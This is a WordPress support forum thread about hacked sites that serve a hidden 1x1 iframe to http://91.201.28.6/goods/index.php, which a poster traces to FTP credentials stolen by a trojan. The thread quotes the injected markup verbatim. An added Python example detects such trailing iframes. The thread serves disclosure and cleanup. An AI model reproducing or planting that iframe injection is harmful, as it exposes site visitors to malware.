WordPress.org


iframe tag after html close (11 posts)

  1. jonhinch
    Member
    Posted 4 years ago #

    Hi I have just moved up to version 2.9.1 and I have noticed a problem with my site.

    I am getting an extra line added at the end of the code

    </html><iframe src="http://91.201.28.6/goods/index.php" width="1" height="1" frameborder="0"></iframe>

    which is fine in Explorer but in Firefox it makes my page jump to the bottom.

    I don't like the look of the good and searching through my sources I can't seem to find it or anything close.

    I have tried suspending plugins and then switch themes but it still appeared. Now I am a bit stumped and concerned.

    I had to update the database to move to 2.9.1. Can I reverse the release out or do I need to find how the code is made?

  2. jonhinch
    Member
    Posted 4 years ago #

    Mmm I have noticed it is happening with a 2.8 installation too.

    I am wondering if I have a virus somewhere. I have tried it on different machines and in different browsers. How can extra code get added?

  3. nandayo
    Member
    Posted 4 years ago #

    Jon,

    Same here. Check out every index.php file in your folders and remove the line. I had to remove the lines from 5 files (/, /plugins/index.php, /wp-content/index.php and /wp-content/themes/*/index.php & /footer.php).

    I have had it for 2 days and it MUST be some WP plugin because I didn't do anything but upgrade some plugins. Maybe some statistic tracker? I have no idea and I'm too scared to find out ;)

    Hope that helps!

  4. nandayo
    Member
    Posted 4 years ago #

    PS: Better change your FTP password ASAP after removing all lines I think :(

  5. nandayo
    Member
    Posted 4 years ago #

    ... and it didn't help. After an hour the spam thing was back again in every single file.

  6. jonhinch
    Member
    Posted 4 years ago #

    I have done text level searches of all the code for "iframe" and nothing looked wrong.
    The index.php etc. are all free of this code.
    Does anyone know where I can find a list of what is called when? Or know what sources I need to check for routines that are called after the last </html>?
    Is it possible for something outside of WordPress to tag an extra line on?
    I did wonder if it was Google Analytics or something but I don't see how it can be.

  7. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    is probably a good place to start...no plugins I use, or analytics, or anything like that adds in an iframe.....nor does WP itself...so it looks more and more like a hack

    There's many ways for code to be inserted into your source....from rogue files stuck on your server, stuff in your DB, etc.

  8. nandayo
    Member
    Posted 4 years ago #

    Found any solution, Jon? Here the iframe tag comes back after 24 hours. Now Google even warns customers:

    http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://91.201.28.6/goods/index.php&client=chromium&hl=en-US

  9. Jon Henwood
    Member
    Posted 4 years ago #

    Hi Folks

    I had the same problem and discovered that it is actually a trojgen that sits on your computer that you use to access your FTP. What it does is get the FTP passwords of any hosting accounts that you upload to from that computer. It then (or someone at the other end) adds that <iframe> tag.

    To fix this...
    - Update your virus scanner and scan your machine
    - Change all your FTP passwords
    - Update to the latest CGI script (WordPress / Joomla / etc.)
    - Go through all the index files in each site you FTP and remove the tag

  10. Jon Henwood
    Member
    Posted 4 years ago #

    An update to the last post...

    Make sure you check all index files (there could be over 100 depending on your site's plugins and functionality) as it affects them all.
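
Added example, not part of the thread and not any poster's code: a scanner for the manual check described in posts 9 and 10, listing every file whose content after the final `</html>` (or PHP `?>`) contains an `<iframe>`. The end-marker heuristic, the file extensions and the sample strings are assumptions constructed for illustration.

```python
import os
import re

# Heuristic (assumption): injected markup is appended after the last </html> or PHP ?>.
END_MARK = re.compile(r"</html\s*>|\?>", re.IGNORECASE)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR = re.compile(r"""([\w-]+)\s*=\s*["']?([^"'\s>]+)""")
EXTENSIONS = (".php", ".html", ".htm")  # assumption: file types worth checking


def trailing_iframes(text):
    """Return one attribute dict per <iframe> found after the final end marker."""
    marks = list(END_MARK.finditer(text))
    if not marks:
        return []
    tail = text[marks[-1].end():]
    found = []
    for tag in IFRAME.findall(tail):
        attrs = {k.lower(): v for k, v in ATTR.findall(tag)}
        # A 1x1 (or 0x0) frame is invisible to visitors: the pattern from the thread.
        attrs["hidden"] = all(attrs.get(d, "").isdigit() and int(attrs[d]) <= 1
                              for d in ("width", "height"))
        found.append(attrs)
    return found


def scan_tree(root):
    """Map each affected file under root to its trailing-iframe findings."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(EXTENSIONS):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = trailing_iframes(fh.read())
                if hits:
                    findings[path] = hits
    return findings


# Constructed samples: 192.0.2.1 is a documentation-only address.
INFECTED = ('<html><body>hi</body></html><iframe src="http://192.0.2.1/x.php" '
            'width="1" height="1" frameborder="0"></iframe>')
CLEAN = '<html><body><iframe src="https://example.com/v" width="560" height="315"></iframe></body></html>'

if __name__ == "__main__":
    for path, hits in sorted(scan_tree(".").items()):
        for hit in hits:
            print(path, hit.get("src"), "hidden" if hit["hidden"] else "visible")
```

Run it from a downloaded copy of the site; a file that keeps reappearing in the output after cleaning means the files are still being rewritten, as post 5 describes.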

  11. nandayo
    Member
    Posted 4 years ago #

    Helped. Thanks a lot, Jon!

Topic Closed

This topic has been closed to new replies.